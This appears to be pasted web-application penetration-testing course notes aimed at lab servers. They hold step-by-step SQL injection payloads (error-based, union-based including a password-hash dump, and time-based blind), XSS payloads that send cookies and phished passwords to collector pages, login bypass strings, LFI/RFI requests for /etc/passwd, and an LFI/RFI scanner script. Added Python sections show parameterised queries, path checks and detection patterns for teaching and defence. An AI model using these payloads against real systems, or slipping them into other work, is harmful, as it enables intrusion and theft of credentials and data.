http://54.149.82.150/bookdetail.aspx?id=2


Ok, there is parameter passing (bookdetail.aspx?id=2).

The page name is:           bookdetail.aspx
The parameter name is:      id
The parameter value is:     2


Let's try throwing a single quote (') in there:

http://54.149.82.150/bookdetail.aspx?id=2'


I get the following error:

Unclosed quotation mark after the character string ''.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.




#############################################################################
# SQL Injection                                                             #
# https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
#############################################################################


- Another quick way to test for SQLI is to remove the parameter value


#############################
# Error-Based SQL Injection #
#############################
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--     NOTE: "N" just means to keep going until you run out of databases
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--




#############################
# Union-Based SQL Injection #
#############################
http://54.149.82.150/bookdetail.aspx?id=2 order by 100--
http://54.149.82.150/bookdetail.aspx?id=2 order by 50--
http://54.149.82.150/bookdetail.aspx?id=2 order by 25--
http://54.149.82.150/bookdetail.aspx?id=2 order by 10--
http://54.149.82.150/bookdetail.aspx?id=2 order by 5--
http://54.149.82.150/bookdetail.aspx?id=2 order by 6--
http://54.149.82.150/bookdetail.aspx?id=2 order by 7--
http://54.149.82.150/bookdetail.aspx?id=2 order by 8--
http://54.149.82.150/bookdetail.aspx?id=2 order by 9--
http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

    We are using a union select statement because we are joining the developer's query with one of our own.
    Reference:
    http://www.techonthenet.com/sql/union.php
    The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
    It removes duplicate rows between the various SELECT statements.

    Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

    Negating the parameter value (changing id=2 to id=-2) forces the page to display the columns that echo back data, because the developer's own query then returns no rows.

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--



- Another way is to see if you can get the backend to perform an arithmetic function
http://54.149.82.150/bookdetail.aspx?id=(2)
http://54.149.82.150/bookdetail.aspx?id=(4-2)
http://54.149.82.150/bookdetail.aspx?id=(4-1)



http://54.149.82.150/bookdetail.aspx?id=2 or 1=1--
http://54.149.82.150/bookdetail.aspx?id=2 or 1=2--
http://54.149.82.150/bookdetail.aspx?id=1*1
http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1#
http://54.149.82.150/bookdetail.aspx?id=2 or 1<99#
http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1#
http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3--
http://54.149.82.150/bookdetail.aspx?id=2 &0#




###############################
# Blind SQL Injection Testing #
###############################
Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER

3 - Total Characters
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--      (Ok, the username is 3 chars long - it waited 10 seconds)

Let's go for a quick check to see if it's DBO
http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--

Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.

D - 1st Character
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--  (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)

B - 2nd Character
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds

O - 3rd Character
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds



  3073. ###################################################################
  3074. # What is XSS                                                     #
  3075. # https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
  3076. ###################################################################
  3077.  
  3078. OK - what is Cross Site Scripting (XSS)
  3079.  
  3080. 1. Use Firefox to browse to the following location:
  3081.  
  3082.     http://54.172.112.249/xss_practice/
  3083.  
  3084.     A really simple search page that is vulnerable should come up.
  3085.  
  3086.  
  3087.  
  3088.  
  3089. 2. In the search box type:
  3090.    
  3091.     <script>alert('So this is XSS')</script>
  3092.  
  3093.  
  3094.     This should pop-up an alert window with your message in it proving XSS is in fact possible.
  3095.     Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  3096.  
  3097.  
  3098. 3. In the search box type:
  3099.    
  3100.     <script>alert(document.cookie)</script>
  3101.  
  3102.  
  3103.     This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  3104.     Ok, click OK and then click back and go back to http://554.172.112.249/xss_practice/
  3105.  
  3106. 4. Now replace that alert script with:
  3107.  
  3108.     <script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  3109.  
  3110.  
  3111. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  3112.  
  3113.  
  3114. 5. Now view the stolen cookie at:
  3115.     http://54.172.112.249/xss_practice/cookie_stealer_logs.html
  3116.  
  3117.  
  3118. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  3119.  
  3120.  
  3121.  
  3122.  
  3123.  
  3124.  
############################
# A Better Way To Demo XSS #
############################


Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.


Use Firefox to browse to the following location:

    http://54.172.112.249/xss_practice/



Paste this in the search box
----------------------------


Option 1
--------

<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>


Now view the stolen password at:
    http://54.172.112.249/xss_practice/passwords.html



Option 2
--------
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
</script>




Now view the stolen username and password at:
http://54.172.112.249/xss_practice/username_password_logs.html




#########################################
# Let's kick it up a notch with ASP.NET #
# http://54.200.178.220/                #
#########################################


The trading Web App is on http://54.200.178.220/


Try the following in the search box:
    <script>alert(123);</script>
    ' or 1=1
    ' and a=a
    1=1
    Joe'+OR+1=1;--


Open a new tab in Firefox and try this:
    http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName


Try the contact us form.
Open a new tab in Firefox and try this:
    http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini

Try this on the inquiry form:
    Joe McCray
    1234567890
    joe@strategicsec.com') waitfor delay '00:00:10'--


Login Box:

    ' or 1=1 or ''='
    anything            (click login instead of pressing enter)



Tamper Data: (notice 2 session IDs)

    AcmeTrading=a4b796687b846dd4a34931d708c62b49;       SessionID is md5
    IsAdmin=yes;
    ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45



Profile - Detail    (tamper data)
    Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
    joe|set


    xss_upload.txt (Upload Bulk Order)
    <script>alert(123);</script>




###############################
# How much fuzzing is enough? #
###############################
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.

Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.


Step 1: Ask yourself the 3 questions per page of the site.

Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter).

Step 3: When you load your fuzz strings, use the following decision tree:

    - Are the fuzz strings causing a default error message (example: 404)?
        - If this is the case then it is most likely NOT vulnerable

    - Are the fuzz strings causing a WAF or LB custom error message?
        - If this is the case then you need to find an encoding method to bypass


    - Are the fuzz strings causing an error message that discloses the backend type?
        - If yes, then identify the DB type and find the correct syntax to successfully exploit
        - Some example strings that I use are:
            '
            "
            ()          <----- Take the parameter value and put it in parentheses
            (5-1)       <----- See if you can perform an arithmetic function


    - Are the fuzz strings rendering executable code?
        - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
        - Some example strings that I use are:
            <b>hello</b>
            <u>hello</u>
            <script>alert(123);</script>
            <script>alert(xss);</script>
            <script>alert('xss');</script>
            <script>alert("xss");</script>






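The decision tree above written out as triage code, as an added Python example that is not part of the course notes: each response to a fuzz string is classified as a default error, a WAF/LB block, a backend-disclosing error (with the database type identified), rendered markup, or no signal, and a budget of 10-20 strings per parameter is walked until something actionable turns up. The error fingerprints, the WAF phrases and the sample responses are constructed for illustration; extend the patterns with what you actually observe.

```python
import re

# Outcomes of the decision tree.
DEFAULT_ERROR = "default_error"        # generic server page (404 etc.): most likely not vulnerable
WAF_OR_LB = "waf_or_lb_custom_error"   # blocked before reaching the app: needs a different encoding
DB_ERROR = "backend_error_disclosed"   # error text reveals the database type
RENDERED = "fuzz_string_rendered"      # markup echoed unencoded: report XSS
NO_SIGNAL = "no_signal"                # nothing observable: next string, or move on

# Constructed fingerprints of common driver/database error messages, keyed by backend.
DB_ERROR_PATTERNS = {
    "oracle": re.compile(r"\bORA-\d{5}\b"),
    "mssql": re.compile(r"Unclosed quotation mark|Incorrect syntax near", re.I),
    "mysql": re.compile(r"You have an error in your SQL syntax", re.I),
    "postgres": re.compile(r"syntax error at or near", re.I),
}
# Constructed phrases typical of a WAF or load-balancer block page.
WAF_PATTERN = re.compile(r"request blocked|web application firewall|mod_security", re.I)


def triage(fuzz_string, status, body):
    """Classify one (status, body) response to a fuzz string.
    Returns (outcome, detail); detail is the database type when it is disclosed.
    Checks run from most to least specific, because a DB error usually arrives
    with a 500 status and would otherwise be mistaken for a default error page."""
    # Markup echoed back byte-for-byte is the "rendering executable code" case;
    # an encoded echo (&lt;b&gt;) does not match and is not rendered.
    if "<" in fuzz_string and fuzz_string in body:
        return RENDERED, None
    for backend, pattern in DB_ERROR_PATTERNS.items():
        if pattern.search(body):
            return DB_ERROR, backend
    if status == 403 or WAF_PATTERN.search(body):
        return WAF_OR_LB, None
    if status in (400, 404, 500):
        return DEFAULT_ERROR, None
    return NO_SIGNAL, None


def arithmetic_evaluated(body_for_literal, body_for_expression):
    """The (5-1) check: if the page for the literal 4 and the page for (5-1) are
    the same, the backend evaluated the expression, which points at injection."""
    return body_for_literal.strip() == body_for_expression.strip()


def fuzz_parameter(responses, budget=20):
    """Walk at most `budget` responses (the 10-20 strings per parameter rule) and
    stop at the first actionable outcome. `responses` holds (fuzz_string, status, body)."""
    for fuzz_string, status, body in responses[:budget]:
        outcome, detail = triage(fuzz_string, status, body)
        if outcome in (RENDERED, DB_ERROR, WAF_OR_LB):
            return fuzz_string, outcome, detail
    return None, NO_SIGNAL, None


if __name__ == "__main__":
    # Constructed sample responses for one parameter.
    sample = [
        ("'", 404, "<h1>404 Not Found</h1>"),
        ("<b>hello</b>", 200, "Results for &lt;b&gt;hello&lt;/b&gt;"),
        ('"', 500, "java.sql.SQLException: ORA-00933: SQL command not properly ended"),
    ]
    print(fuzz_parameter(sample))
```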
############################
# Trading Web App with WAF #
# http://54.213.131.105    #
############################


Try the following in the search box:
    <script>alert(123);</script>
    <script>alert(123);</script
    <script>alert(123)
    <script>alert
    <script>
    <script
    <scrip
    <scri
    <scr
    <sc
    <s
    <p
    <
    < s
    Joe'+OR+1=1;--


Open a new tab in Firefox and try this:
    http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName


    xss_upload.txt (Upload Bulk Order)
    <script>alert(123);</script>


Login Box:

    ' or 1=1 or ''='
    anything



Tamper Data: (notice 2 session IDs)

    AcmeTrading=a4b796687b846dd4a34931d708c62b49;       SessionID is md5
    IsAdmin=yes;
    ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45



Profile - Detail    (tamper data)
    Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
    joe|set







###########################################################
# Attacking an Oracle/JSP based WebApp with SQL Injection #
###########################################################



http://54.69.156.253:8081/bookcompany/


user:   a' OR 'a'='a
pass:   a' OR 'a'='a



http://54.69.156.253:8081/bookcompany/author.jsp?id=111


[ Search by Username ]  Joe' OR 'a'='a



http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1



http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1



http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--


Host is running:



http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--

User is:



http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--

Current database is:
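Why the login bypass above works and what fixes it, as an added Python example that is not part of the course notes or of the bookcompany app: a query assembled by string concatenation lets the quote in `a' OR 'a'='a` close the string literal and turn the WHERE clause into one that is always true, while the same input bound as a parameter is compared as a plain value. sqlite3 stands in for the Oracle backend here (the quoting behaviour the payload abuses is the same); the user table is constructed, and the log-side heuristic at the end is an assumption to tune rather than a production rule.

```python
import re
import sqlite3


def build_db():
    """Constructed sample data: one valid account, in an in-memory database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('joe', 'correct-horse')")
    con.commit()
    return con


def login_concat(con, username, password):
    """Vulnerable: the query is built by concatenation. With the payload the SQL
    becomes  ... WHERE username='a' OR 'a'='a' AND password='a' OR 'a'='a'
    and the trailing OR 'a'='a' is always true, so any row satisfies it."""
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_param(con, username, password):
    """Fixed: bound parameters. The payload is sent as a value, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


def search_by_username_param(con, name):
    """Parameterised equivalent of the [ Search by Username ] field above."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in con.execute(sql, (name,))]


# Detection side (assumed heuristic): a quote followed by OR/AND, or an SQL comment
# sequence, as in the payloads above. Legitimate names with apostrophes do not match.
INJECTION_HINT = re.compile(r"'\s*(or|and)\b|--|/\*", re.I)


def looks_like_injection_attempt(value):
    return INJECTION_HINT.search(value) is not None


if __name__ == "__main__":
    db = build_db()
    payload = "a' OR 'a'='a"
    print("concatenated query, payload accepted:", login_concat(db, payload, payload))
    print("parameterised query, payload accepted:", login_param(db, payload, payload))
    print("flagged for review:", looks_like_injection_attempt("Joe' OR 'a'='a"))
```

The `utl_inaddr` requests further up are a different technique (error-based extraction of query results through an Oracle function), but they depend on the same root cause, and binding the `qid` parameter removes them as well.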
  3412.  
  3413.  
  3414.  
  3415.  
######################
# Lesson 27: Web App #
######################
vi wpbruteforcer.py


python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt



- Here is an example of an LFI
- Open this page in Firefox:
http://54.172.112.249/showfile.php?filename=contactus.txt

- Notice the page name (showfile.php), the parameter name (filename) and the file name (contactus.txt)
- Here you see a direct reference to a file on the local filesystem of the victim machine.
- You can attack this by doing the following:
http://54.172.112.249/showfile.php?filename=/etc/passwd

- This is an example of a Local File Include (LFI). To change this attack into a Remote File Include (RFI) you need some content from
  somewhere else on the Internet. Here is an example of a text file on the web:
http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt

- Now we can attack the target via RFI like this:
http://54.172.112.249/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt


- Now let's see if we can write some code to do this for us:

vi LFI-RFI.py



#!/usr/bin/env python
# Python 2 script: uses the print statement and urllib2.
import urllib2, re, sys

print "\n### PHP LFI/RFI Detector ###"
print "### Sean Arries 09/18/09 ###\n"


TARGET = "http://54.172.112.249/showfile.php?filename=contactus.txt"
RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
TravLimit = 12 ## MAXIMUM NUMBER OF ../ LEVELS TO TRY

print "==> Testing for LFI vulns.."
TARGET = TARGET.split("=")[0]+"=" ## KEEP EVERYTHING UP TO "filename=" (URL MANIPULATION)
for x in xrange(TravLimit): ## ITERATE THROUGH THE LOOP, ADDING ONE ../ PER PASS
    TARGET += "../"
    try:
        source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
    except urllib2.URLError, e:
        print "$$$ We had an Error:",e
        sys.exit(0)
    if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
        print "!! ==> LFI Found:",TARGET+"etc/passwd"
        break ## BREAK LOOP WHEN VULN FOUND
else:
    print "==> No LFI found within",TravLimit,"directory levels"

print "\n==> Testing for RFI vulns.."
TARGET = TARGET.split("=")[0]+"="+RFIVULN ## POINT filename= AT THE REMOTE FILE (URL MANIPULATION)
try:
    source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
except urllib2.URLError, e:
    print "$$$ We had an Error:",e
    sys.exit(0)
if re.search("j0e",source): ## SEARCH FOR THE MARKER TEXT EXPECTED FROM THE REMOTE FILE
    print "!! => RFI Found:",TARGET


print "\nScan Complete\n" ## DONE
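The server-side counterpart to the scanner above, as an added Python example that is not part of the course notes and not the showfile.php code: a resolver for the `filename` parameter that refuses URLs (the RFI case), absolute paths and `../` traversal (the LFI case) and NUL bytes, and only serves files that resolve inside a fixed document root, plus a log-side classifier for the same three request shapes. The document root path is a hypothetical value and the inputs are the ones the lesson uses.

```python
import os
import re
from urllib.parse import urlsplit

# Hypothetical document root for the files showfile.php is meant to serve.
DOC_ROOT = "/var/www/html/files"


def resolve_filename(filename, doc_root=DOC_ROOT):
    """Return the absolute path to read for ?filename=..., or None when the
    request must be refused."""
    # RFI: a value carrying a URL scheme (http://, ftp://, ...) is never a local file.
    if urlsplit(filename).scheme:
        return None
    # NUL bytes were used with older PHP to truncate the path; refuse them outright.
    if "\x00" in filename:
        return None
    # os.path.join discards doc_root when filename is absolute ("/etc/passwd") and
    # normpath collapses "../" sequences, so the containment check below sees the
    # path the filesystem would actually open.
    candidate = os.path.normpath(os.path.join(doc_root, filename))
    if os.path.commonpath([doc_root, candidate]) != doc_root:
        return None
    return candidate


# Log-side view: traversal in plain, backslash and URL-encoded forms.
TRAVERSAL = re.compile(r"\.\./|\.\.\\|%2e%2e", re.I)


def classify_request(filename):
    """Label a filename parameter value for detection and alerting."""
    if urlsplit(filename).scheme:
        return "rfi_attempt"
    if filename.startswith("/") or TRAVERSAL.search(filename):
        return "lfi_attempt"
    return "normal"


if __name__ == "__main__":
    # The three requests from the lesson above, plus a legitimate one.
    for value in [
        "contactus.txt",
        "/etc/passwd",
        "../../../../etc/passwd",
        "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt",
    ]:
        print(classify_request(value), "->", resolve_filename(value))
```

The containment check uses `os.path.commonpath` rather than a string prefix test so that a sibling directory such as `/var/www/html/files2` is not accepted. An allowlist of the handful of file names the page legitimately serves is simpler still and is the better fix where the set is small.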